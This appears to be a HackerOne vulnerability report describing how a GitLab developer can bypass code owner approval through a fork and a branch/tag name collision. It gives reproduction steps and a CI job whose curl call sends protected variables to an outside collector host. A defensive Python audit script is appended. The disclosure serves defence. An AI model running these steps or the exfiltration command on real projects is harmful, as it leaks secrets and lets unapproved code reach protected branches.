Bypassing Codeowners approve using fork repo
HackerOne report #2418591 by ali_shehab
on 2024-03-15, assigned to @rshambhuni:
Report
Summary
Hey team, hope you are doing well. I found another way to bypass code owner approvals, but this time using a forked repo, allowing reading protected variables of a private group and pushing code to a protected branch.
Steps to reproduce
As an owner:
- Create a new group, and apply the ultimate trial to it
- Create a new private project in that group
- Create a `CODEOWNERS` file with the following content:

```
[Code Owners]
*.yml [@]OWNER_USERNAME
```
- Create a `.gitlab-ci.yml` file with the following content:

```yaml
my_job:
  script:
    - echo "Hello"
```
- Navigate to https://gitlab.com/GROUP/PROJECT/-/settings/repository, allow developers and maintainers to merge, and toggle on code owner approval
- Navigate to https://gitlab.com/GROUP/PROJECT/-/settings/merge_requests, and enable "Remove approvals by Code Owners if their files changed"
- Invite a developer to that group
As the developer:
- Fork that project
- In the forked project, create a new branch called `protected`, and add any "safe" change to the `.gitlab-ci.yml` file, something similar to:

```yaml
my_job:
  script:
    - echo "Hello, this is safe"
```
- Create an MR targeting the original project's main branch
As the owner:
- Approve the MR; at this point the owner is okay with that code being merged into main, as it's safe
As the developer:
- In the forked project, create a tag called `protected`
- In the forked project, on the `protected` branch, add any change to the README.md (this doesn't require a code owner approval)
- Verify that the changes page in the MR is messed up
- Back in the forked project, on the `protected` branch, add any evil code to the `.gitlab-ci.yml`, something similar to:

```yaml
my_job:
  script:
    - echo "Hello, this is safe"
job_name:
  script:
    - curl -X GET "https://qlfb8ytseezdfmvtee92juuzeqkg85.oastify.com?VAR=$VAR" # any server controlled by the user
```
- Delete the `protected` tag
- On the MR changes page, create a commit that contains any change
- Verify that the approval persisted, and merge the MR
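As an added example (not part of this report or of GitLab's code), a small Python audit of the invariant this bypass breaks: once "Remove approvals by Code Owners if their files changed" is enabled, any push to the MR that touches a code-owner-matched file must leave zero code owner approvals. It also lists branch/tag name collisions in a fork, the ref ambiguity the steps above rely on. The CODEOWNERS matching is a simplified approximation of GitLab's, the push timeline is constructed sample data, and `@owner` is a placeholder handle.

```python
import fnmatch
from dataclasses import dataclass

def parse_codeowners(text):
    """Minimal CODEOWNERS parser: skips [Section] headers, comments and blanks."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("["):
            continue
        pattern, *owners = line.split()  # 'pattern @owner ...'
        rules.append((pattern, owners))
    return rules

def code_owned(rules, paths):
    """Changed paths matching a rule; '*.yml' style patterns match the file name too."""
    owned = []
    for path in paths:
        name = path.rsplit("/", 1)[-1]
        if any(fnmatch.fnmatch(path, p) or fnmatch.fnmatch(name, p) for p, _ in rules):
            owned.append(path)
    return owned

@dataclass
class Push:
    sha: str                         # constructed sample id, not a real commit
    files: list                      # paths changed by this push
    code_owner_approvals_after: int  # code owner approvals still counted afterwards

def audit_mr(rules, pushes):
    """Flag pushes that changed a code-owned file while a code owner approval
    survived; with the removal setting enabled that count must drop to zero."""
    findings = []
    for push in pushes:
        owned = code_owned(rules, push.files)
        if owned and push.code_owner_approvals_after > 0:
            findings.append((push.sha, owned))
    return findings

def ambiguous_refs(branches, tags):
    """Names used both as a branch and as a tag in the fork (e.g. 'protected')."""
    return sorted(set(branches) & set(tags))

CODEOWNERS = "[Code Owners]\n*.yml @owner\n"  # the rule from the report, placeholder owner
PUSHES = [Push("a1", ["README.md"], 1),       # constructed: not code-owned, fine
          Push("b2", [".gitlab-ci.yml"], 1)]  # constructed: owned file, approval kept
```

`audit_mr(parse_codeowners(CODEOWNERS), PUSHES)` reports push `b2` only, which is exactly the step in the report where the approval should have been reset but persisted.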
Impact
Bypassing code owner approval allows reading protected variables of the group and project without having permission and, on top of that, pushing unapproved code to protected branches.